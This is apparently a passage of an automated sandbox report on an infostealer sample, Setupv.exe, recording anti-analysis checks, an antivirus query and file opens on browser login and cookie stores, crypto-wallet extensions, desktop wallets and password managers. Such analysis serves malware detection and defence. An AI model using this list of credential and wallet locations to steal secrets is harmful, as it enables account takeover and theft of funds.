        Source: Setupv.exe, 00000000.00000003.1751520330.0000000003D73000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
        Source: Setupv.exe, 00000000.00000003.1751520330.0000000003D73000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696428655
        Source: Setupv.exe, 00000000.00000003.1751520330.0000000003D73000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696428655
        Source: Setupv.exe, 00000000.00000003.1751520330.0000000003D73000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696428655o
        Source: Setupv.exe | Binary or memory string: HFHGFsGF
        Source: Setupv.exe, 00000000.00000003.1751520330.0000000003D73000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
        Source: Setupv.exe, 00000000.00000003.1751520330.0000000003D73000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: turbotax.intuit.comVMware20,11696428655t
        Source: Setupv.exe, 00000000.00000003.1751520330.0000000003D73000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696428655
        Source: Setupv.exe, 00000000.00000003.1751520330.0000000003D73000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
        Source: Setupv.exe, 00000000.00000003.1751520330.0000000003D73000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696428655j
        Source: Setupv.exe, 00000000.00000003.1751520330.0000000003D73000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
        Source: Setupv.exe, 00000000.00000003.1751520330.0000000003D73000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
        Source: Setupv.exe, 00000000.00000003.1751520330.0000000003D73000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696428655x
        Source: Setupv.exe, 00000000.00000003.1751520330.0000000003D73000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
        Source: Setupv.exe, 00000000.00000003.1751520330.0000000003D73000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
        Source: C:\Users\user\Desktop\Setupv.exe | Process information queried: ProcessInformation
        Source: C:\Users\user\Desktop\Setupv.exe | Code function: 0_3_02E57BE0 LdrInitializeThunk, | 0_3_02E57BE0
        Source: C:\Users\user\Desktop\Setupv.exe | Code function: 0_2_02730AC9 mov eax, dword ptr fs:[00000030h] | 0_2_02730AC9
        Source: C:\Users\user\Desktop\Setupv.exe | Code function: 0_2_02730509 mov edx, dword ptr fs:[00000030h] | 0_2_02730509
        Source: C:\Users\user\Desktop\Setupv.exe | Code function: 0_2_02730E79 mov eax, dword ptr fs:[00000030h] | 0_2_02730E79
        Source: C:\Users\user\Desktop\Setupv.exe | Code function: 0_2_02731B07 mov eax, dword ptr fs:[00000030h] | 0_2_02731B07
        Source: C:\Users\user\Desktop\Setupv.exe | Code function: 0_2_02731119 mov eax, dword ptr fs:[00000030h] | 0_2_02731119
        Source: C:\Users\user\Desktop\Setupv.exe | Code function: 0_2_02731118 mov eax, dword ptr fs:[00000030h] | 0_2_02731118
        Source: C:\Users\user\Desktop\Setupv.exe | Queries volume information: C:\ VolumeInformation
        Source: C:\Users\user\Desktop\Setupv.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
        Source: Setupv.exe, 00000000.00000003.1810264932.0000000003AAC000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1818067077.0000000003AEF000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1810403122.0000000003AED000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000002.1856112648.0000000003AEF000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1817844215.0000000003AAF000.00000004.00000800.00020000.00000000.sdmp, Setupv.exe, 00000000.00000003.1811025242.0000000000C89000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
        Source: C:\Users\user\Desktop\Setupv.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

        Stealing of Sensitive Information

        Source: Yara match | File source: 00000000.00000003.1851653788.0000000002CE2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: sslproxydump.pcap, type: PCAP
        Source: Yara match | File source: Process Memory Space: Setupv.exe PID: 7840, type: MEMORYSTR
        Source: C:\Users\user\Desktop\Setupv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
        Source: C:\Users\user\Desktop\Setupv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
        Source: C:\Users\user\Desktop\Setupv.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db
        Source: C:\Users\user\Desktop\Setupv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
        Source: C:\Users\user\Desktop\Setupv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
        Source: C:\Users\user\Desktop\Setupv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
        Source: C:\Users\user\Desktop\Setupv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
        Source: C:\Users\user\Desktop\Setupv.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
        Source: C:\Users\user\Desktop\Setupv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
        Source: C:\Users\user\Desktop\Setupv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
        Source: C:\Users\user\Desktop\Setupv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
        Source: C:\Users\user\Desktop\Setupv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
        Source: C:\Users\user\Desktop\Setupv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
        Source: C:\Users\user\Desktop\Setupv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
        Source: C:\Users\user\Desktop\Setupv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
        Source: C:\Users\user\Desktop\Setupv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
        Source: C:\Users\user\Desktop\Setupv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
        Source: C:\Users\user\Desktop\Setupv.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
        Source: C:\Users\user\Desktop\Setupv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
        Source: C:\Users\user\Desktop\Setupv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
        Source: C:\Users\user\Desktop\Setupv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
        Source: C:\Users\user\Desktop\Setupv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
        Source: C:\Users\user\Desktop\Setupv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
        Source: C:\Users\user\Desktop\Setupv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
        Source: C:\Users\user\Desktop\Setupv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
        Source: C:\Users\user\Desktop\Setupv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
        Source: C:\Users\user\Desktop\Setupv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
        Source: C:\Users\user\Desktop\Setupv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
        Source: C:\Users\user\Desktop\Setupv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
        Source: C:\Users\user\Desktop\Setupv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
        Source: C:\Users\user\Desktop\Setupv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
        Source: C:\Users\user\Desktop\Setupv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
        Source: C:\Users\user\Desktop\Setupv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
        Source: C:\Users\user\Desktop\Setupv.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite
        Source: C:\Users\user\Desktop\Setupv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
        Source: C:\Users\user\Desktop\Setupv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
        Source: C:\Users\user\Desktop\Setupv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
        Source: C:\Users\user\Desktop\Setupv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
        Source: C:\Users\user\Desktop\Setupv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
        Source: C:\Users\user\Desktop\Setupv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
        Source: C:\Users\user\Desktop\Setupv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
        Source: C:\Users\user\Desktop\Setupv.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
        Source: C:\Users\user\Desktop\Setupv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
        Source: C:\Users\user\Desktop\Setupv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
        Source: C:\Users\user\Desktop\Setupv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
        Source: C:\Users\user\Desktop\Setupv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
        Source: C:\Users\user\Desktop\Setupv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
        Source: C:\Users\user\Desktop\Setupv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
        Source: C:\Users\user\Desktop\Setupv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
        Source: C:\Users\user\Desktop\Setupv.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
        Source: C:\Users\user\Desktop\Setupv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
        Source: C:\Users\user\Desktop\Setupv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
        Source: C:\Users\user\Desktop\Setupv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
        Source: C:\Users\user\Desktop\Setupv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
        Source: C:\Users\user\Desktop\Setupv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
        Source: C:\Users\user\Desktop\Setupv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
        Source: C:\Users\user\Desktop\Setupv.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
        Source: C:\Users\user\Desktop\Setupv.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pdliaogehgdbhbnmkklieghmmjkpigpaJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Roaming\ArmoryJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Roaming\DashCore\walletsJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Roaming\WalletWasabi\Client\WalletsJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Roaming\Daedalus Mainnet\walletsJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Local\1PasswordJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Roaming\NordPassJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeFile opened: C:\Users\user\AppData\Roaming\BitwardenJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeDirectory queried: C:\Users\user\Documents\IPKGELNTQYJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeDirectory queried: C:\Users\user\Documents\PALRGUCVEHJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeDirectory queried: C:\Users\user\Documents\PALRGUCVEHJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeDirectory queried: C:\Users\user\Documents\SFPUSAFIOLJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeDirectory queried: C:\Users\user\Documents\ZQIXMVQGAHJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeDirectory queried: C:\Users\user\Documents\ZQIXMVQGAHJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeDirectory queried: C:\Users\user\Documents\NYMMPCEIMAJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeDirectory queried: C:\Users\user\Documents\NYMMPCEIMAJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
        Source: C:\Users\user\Desktop\Setupv.exeDirectory queried: C:\Users\user\Documents\UOOJJOZIRHJump to behavior
